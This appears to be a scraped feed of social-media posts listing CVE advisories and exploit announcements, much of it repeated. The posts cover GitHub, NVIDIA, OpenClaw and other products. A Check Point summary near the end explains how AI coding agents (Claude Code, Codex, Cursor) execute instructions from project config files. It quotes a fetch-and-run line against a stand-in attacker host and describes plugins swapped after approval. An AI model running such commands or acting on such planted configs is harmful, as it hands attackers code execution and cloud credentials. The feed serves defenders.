#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/spring-boot-security-update-patches-critical-authentication-bypass-and-rce-flaws-m-w-3-i-y/gD2P6Ple2L

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS- encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24186/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24178/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 https://nvidia.custhelp.com/app/answers/detail/a_id/5819

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: https://nvidia.custhelp.com/app/answers/detail/a_id/5837 #Nvidia #infoec #vulnerability

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism,
allowing an attacker with network access to directly access and modify
its configuration and operational functions without needing credentials.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3893/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41384/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41383/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41394/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41396/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41912/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42426/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42423/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42431/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 New security advisory:

CVE-2026-40473 affects multiple systems.

• Impact: Significant security breach potential
• Risk: Unauthorized access or data exposure
• Mitigation: Apply patches within 24-48 hours

Full breakdown:
https://www.yazoul.net/advisory/cve/cve-2026-40473-camel-mina-unauthenticated-rce

#InfoSec #VulnerabilityManagement #CyberSec

@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei https://masto.kukei.eu/browse/programming category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

@ben @jpmens Yes,; executing commands with parameters given by the user, without any escaping. https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Uh… this seems bad https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#github

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/github-patches-critical-rce-vulnerability-in-github-com-and-github-enterprise-server-r-x-e-8-5/gD2P6Ple2L

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability I am not surprised bug like this now exists. Critical GitHub RCE bug exposed millions of repositories including private one that business users like to keep their code private. GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance https://nvd.nist.gov/vuln/detail/CVE-2026-3854

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Aside from the abysimal uptime Github currently presents, they -also- had one of the worst security incidents you can think of: An RCE via a simple “git push” with total loss of tenant isolation (via https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

Cette faille GitHub est exploitable par un simple Git Push (CVE-2026-3854) https://www.it-connect.fr/cette-faille-github-est-exploitable-par-un-simple-git-push-cve-2026-3854/ #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. https://radar.offseq.com/threat/critical-github-vulnerability-exposed-millions-of--29b3abff #OffSeq #GitHub #Infosec

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

There should be a "but the service is never up to be exploited" reducer on the CVE score.
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Question about the GitHub RCE:

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 says GHES patches were _released_ on 03/10.

https://github.blog/security/securing-the-git-push-pipeline-responding-to-a-critical-remote-code-execution-vulnerability/ says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication or only today, 1.5 months laster?

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
https://news.ycombinator.com/item?id=47936479

#hackernews #tech

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown https://lobste.rs/s/8fxgx7 #security #vibecoding
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Discussion: https://news.ycombinator.com/item?id=47936479

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854
Comments: https://news.ycombinator.com/item?id=47936479

@GossiTheDog Here's a non-Twitter link: https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

HAHAHAHAHHAHAHAHAHAHAH https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

Read on HackerWorkspace: https://hackerworkspace.com/article/github-rce-vulnerability-cve-2026-3854-breakdown-wiz-blog

#aisecurity #vulnerability #exploit

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854 #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

#github

Beaucoup de gens vont sans doute résumer la faille de sécurité CVE-2026-3854 en « Mon Dieu, la totalité des logiciels hébergés sur GitHub ont peut-être été compromis ».

Mais, en fait, c'était déjà possible, Microsoft (propriétaire de GitHub) pouvait déjà tout modifier.

Tout ce qu'a permis CVE-2026-3854, si des gens l'ont exploité, c'est de démocratiser cette possibilité, en la rendant accessible à tous les gens ayant un compte GitHub.

https://www.wiz.io/blog/github-rce-vulnerability-cve-2026-3854

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-7320/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42432/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-42422/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41914/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41405/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41404/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41399/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41395 - High (7.5)

OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 signature verification that canonicalizes query ordering for signatures but hashes raw URLs for replay detection. Attackers can reorder query parameters to bypass replay...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41395/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41387 - High (7.8)

OpenClaw before 2026.3.22 contains an incomplete host environment variable sanitization vulnerability in host-env-security-policy.json and host-env-security.ts that allows package-manager environment overrides. Attackers can exploit approved exec ...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41387/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🔴 CVE-2026-41386 - Critical (9.1)

OpenClaw before 2026.3.22 contains a privilege escalation vulnerability where bootstrap setup codes are not bound to intended device roles and scopes during pairing. Attackers can exploit this during first-use device pairing to escalate privileges...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41386/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41378 - High (8.8)

OpenClaw before 2026.3.31 contains a privilege escalation vulnerability allowing paired nodes with role=node to dispatch node.event agent requests with unrestricted gateway-side tool access. Attackers with trusted paired node credentials can escal...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41378/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-41602 - High (7.5)

Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport Go language implementation

This issue affects Apache Thrift: before 0.23.0.

Users are recommended to upgrade to version 0.23.0, which fixes the issue.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41602/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-27760 - High (8.1)

OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in the installer AJAX endpoint that allows unauthenticated attackers to execute arbitrary code by injecting PHP statements into the databaseConnectivity action parameter....

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-27760/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-5944 - High (8.2)

An improper access control vulnerability exists in the Cisco Intersight Device Connector for Nutanix Prism Central. The service exposes an API passthrough endpoint on TCP port 7373 that is accessible within the network scope of the deployment envi...

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-5944/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

🟠 CVE-2026-3323 - High (7.5)

An unsecured configuration interface on affected devices allows unauthenticated remote attackers to access sensitive information, including hashed credentials and access codes.

🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-3323/

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

Microsoft Patches Critical CVSS 10.0 SSRF Vulnerability in Entra ID

Microsoft patched a critical SSRF vulnerability (CVE-2026-35431) in Entra ID Entitlement Management with a CVSS score of 10.0 that allowed unauthenticated spoofing and internal network access. The flaw was fixed server-side, requiring no action from users to secure their environments.

**No action is needed on your part, Microsoft already fixed this vulnerability on their cloud servers on April 23, 2026. As a good practice, review your Entra ID sign-in and audit logs for any unusual activity from before that date, and ensure multi-factor authentication is enforced for all admin accounts.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/microsoft-patches-critical-cvss-10-0-ssrf-vulnerability-in-entra-id-c-d-3-y-z/gD2P6Ple2L

Three glibc CVEs, including CVSS 9.8 heap overflow in scanf (CVE-2026-5450). Affects glibc 2.7 through 2.43, that's decades of releases. When the C library has bugs, everything on Linux has bugs. Patch.

Over 400,000 sites at risk as hackers exploit Breeze Cache plugin flaw (CVE-2026-3844) https://securityaffairs.com/191267/uncategorized/over-400000-sites-at-risk-as-hackers-exploit-breeze-cache-plugin-flaw-cve-2026-3844.html

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

LMDeploy CVE-2026-33626 Flaw Exploited Within 13 Hours of Disclosure https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/

Remote Code Execution in Apache ActiveMQ

"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"

https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability

🚨 New Exploit: BusyBox 1.37.0 - Path Traversal
📋 CVE: CVE-2026-26157
👤 Author: Calil Khalil

🔗 https://www.exploit-db.com/exploits/52538

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26157

🚨 New Exploit: SUSE Manager 4.3.15 - Code Execution
📋 CVE: CVE-2025-46811
👤 Author: wjmaj98

🔗 https://www.exploit-db.com/exploits/52527

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-46811

@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3

Detail Description :
https://nvd.nist.gov/vuln/detail/CVE-2026-35414
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )

CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/

CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/

🚨 New Exploit: deephas 1.0.7 - Prototype Pollution
📋 CVE: CVE-2026-25047
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52528

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25047

🚨 New Exploit: Repetier-Server 1.4.10 - Path Traversal
📋 CVE: CVE-2026-26335
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52540

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26335

🚨 New Exploit: FUXA 1.2.8 - Authentication Bypass + RCE Exploit
📋 CVE: CVE-2025-69985
👤 Author: joshua

🔗 https://www.exploit-db.com/exploits/52544

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-69985

🚨 New Exploit: Google Chrome 145.0.7632.75 - CSSFontFeatureValuesMap
📋 CVE: CVE-2026-2441
👤 Author: nu11secur1ty

🔗 https://www.exploit-db.com/exploits/52542

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-2441

🚨 New Exploit: SumatraPDF 3.5.2 - Remote Code Execution
📋 CVE: CVE-2026-25961
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52535

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-25961

🚨 New Exploit: JUNG Smart Visu Server 1.1.1050 - Dos
📋 CVE: CVE-2026-26235
👤 Author: banyamer

🔗 https://www.exploit-db.com/exploits/52536

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-26235

🚨 New Exploit: Python-Multipart 0.0.22 - Path Traversal
📋 CVE: CVE-2026-24486
👤 Author: jefersoncardoso.dev

🔗 https://www.exploit-db.com/exploits/52543

#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24486

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: https://steelefortress.com/6o7x90

CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy

CISA just added CVE-2025-24054 to its Known Exploited Vulnerabilities catalog, mandating federal agencies patch Windows systems against an NTLM hash-leaking flaw already weaponized in the wild.

Read more: https://steelefortress.com/6o7x90

CyberDefense #InfoSec #Encryption #DataPrivacy #Privacy

🚨 New Exploit: Windows 11 25H2 - Heap Overflow
📋 CVE: CVE-2026-21248
👤 Author: nu11secur1ty

🔗 https://www.exploit-db.com/exploits/52537